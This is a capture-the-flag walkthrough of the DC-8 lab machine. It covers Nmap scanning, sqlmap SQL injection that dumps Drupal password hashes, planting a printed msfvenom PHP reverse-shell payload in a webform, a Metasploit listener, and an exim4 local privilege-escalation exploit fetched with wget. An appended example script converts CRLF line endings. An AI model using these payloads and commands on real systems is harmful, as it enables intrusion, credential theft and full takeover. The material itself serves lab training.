DC-8
1. Host discovery
Run a ping scan with Nmap and identify the target's IP address from its known MAC address.
Nmap -sP 192.168.43.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-15 16:30 中国标准时间
Nmap scan report for 192.168.43.1
Host is up (0.0049s latency).
MAC Address: EC:D0:9F:84:6C:D1 (Xiaomi Communications)
Nmap scan report for dc-8 (192.168.43.18)
Host is up (0.0010s latency).
MAC Address: 00:0C:29:7F:AC:13 (VMware)
Nmap scan report for ToolsScannerKali20201 (192.168.43.193)
Host is up (0.0050s latency).
MAC Address: 00:0C:29:D4:89:D8 (VMware)
Nmap scan report for LAPTOP-Q7VIH3TM (192.168.43.2)
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 9.89 seconds
2. Information gathering
Port scan
Port scan with Nmap
C:\Users\ASUS>Nmap 192.168.43.18 -A -p- -oN nmap.A
Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-15 16:36 中国标准时间
Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.13% done; ETC: 16:37 (0:00:01 remaining)
Nmap scan report for dc-8 (192.168.43.18)
Host is up (0.000094s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA)
| 256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA)
|_ 256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519)
80/tcp open http Apache httpd
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache
|_http-title: Welcome to DC-8 | DC-8
MAC Address: 00:0C:29:7F:AC:13 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.09 ms dc-8 (192.168.43.18)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.28 seconds
Visit the web page
Fingerprinting
whatweb http://192.168.43.18
Directory scan
dirb http://192.168.43.18
Check the robots.txt file
http://192.168.43.18/robots.txt
Found the backend login page
Found an error-based SQL injection point
3. Exploitation
sqlmap injection
List database names
sqlmap -u http://192.168.43.18/?nid=0%27 --dbs
List table names
sqlmap -u http://192.168.43.18/?nid=0%27 -D d7db --tables
List column names
sqlmap -u http://192.168.43.18/?nid=0%27 -D d7db -T users --columns
Dump column contents
sqlmap -u http://192.168.43.18/?nid=0%27 -D d7db -T users -C "uid,name,pass" --dump
Crack the password hashes with john
Credentials: john:turtle
Log in to the web backend
Find a write point to exploit
Content >> Contact Us (WEBFORMS) >> Components (WEBFORM) >> Form settings
Generate a PHP shell with MSF
kali@ToolsScannerKali20201:~$ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.193 LPORT=4444 R > shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1115 bytes
kali@ToolsScannerKali20201:~$ cat shell.php
/*<?php /**/ error_reporting(0); $ip = '192.168.43.193'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
kali@ToolsScannerKali20201:~$
Paste the PHP shell and execute it
Start a listener in MSF
kali@ToolsScannerKali20201:~$ msfconsole
[!] The following modules could not be loaded!..-
[!] /usr/share/metasploit-framework/modules/exploits/windows/iis/cve-2017-7269.rb
[!] Please see /home/kali/.msf4/logs/framework.log for details.
=[ metasploit v5.0.101-dev ]
+ -- --=[ 2049 exploits - 1108 auxiliary - 344 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: After running db_nmap, be sure to check out the result of hosts and services
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.43.193
LHOST => 192.168.43.193
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.43.193:4444
[*] Sending stage (38288 bytes) to 192.168.43.18
[*] Meterpreter session 1 opened (192.168.43.193:4444 -> 192.168.43.18:44810) at 2020-10-15 07:36:25 -0400
meterpreter > getuid
Server username: www-data (33)
meterpreter >
Go back to the Contact Us page and submit any content
4. Privilege escalation
Interactive shell
shell
python -c "import pty;pty.spawn('/bin/bash')"
Use find to locate binaries with the SUID bit set (stderr goes to /dev/null, not a relative "dev/null" file)
www-data@dc-8:/$ find / -perm /4000 2>/dev/null
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/umount
/bin/mount
Check the exim4 version
Privilege escalation via exim4 requires write permission, so write the file under /tmp.
Use searchsploit to look up known exim4 vulnerabilities
searchsploit exim
Pick the local privilege escalation exploit
cp /usr/share/exploitdb/exploits/linux/local/46996.sh /tmp
python -m SimpleHTTPServer
On the target, download the local privilege escalation exploit with wget
cd /tmp
wget http://192.168.43.193:8000/46996.sh
ls -l
chmod +x 46996.sh
An error occurred
This error also appeared in DC-5.
:set ff=unix (in Vim) converts the line endings so that code written on Windows can run on Unix
After changing it, download it again
Privilege escalation did not succeed
Inspect the script
The script offers two execution methods; try the second one
./46996.sh -m netcat
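The :set ff=unix step above addresses Windows CRLF line endings in a downloaded script. The following added example (not from the original writeup) does the same conversion from the command line and checks that the shebang interpreter no longer carries a trailing "\r"; the sample file name and contents are constructed.

```shell
#!/bin/sh
# Added example (not part of the original DC-8 writeup): detect and strip
# Windows CRLF line endings from a downloaded shell script, which is what
# Vim's ":set ff=unix" does. With CRLF endings the shebang line ends in
# "\r", so the kernel looks for an interpreter literally named "/bin/sh\r"
# and execution fails with "bad interpreter".

# True (exit 0) if the file contains at least one carriage-return byte.
has_crlf() {
    [ "$(tr -cd '\r' < "$1" | wc -c | tr -d ' ')" -gt 0 ]
}

# Strip every "\r" in place, keeping a .bak copy of the original.
to_unix() {
    cp "$1" "$1.bak"
    tr -d '\r' < "$1.bak" > "$1"
}

# Print the interpreter path named on the shebang line (first token after
# "#!"); a leftover "\r" would appear here as an extra trailing byte.
shebang_interp() {
    head -n 1 "$1" | sed 's/^#!//; s/ .*//'
}

# Constructed sample script with CRLF endings (stands in for the exploit
# script fetched with wget in the walkthrough).
SAMPLE="${TMPDIR:-/tmp}/crlf_demo.sh"
printf '#!/bin/sh\r\necho hello\r\n' > "$SAMPLE"

if has_crlf "$SAMPLE"; then
    echo "CRLF found in $SAMPLE, converting"
    to_unix "$SAMPLE"
fi
echo "shebang interpreter now: $(shebang_interp "$SAMPLE")"
```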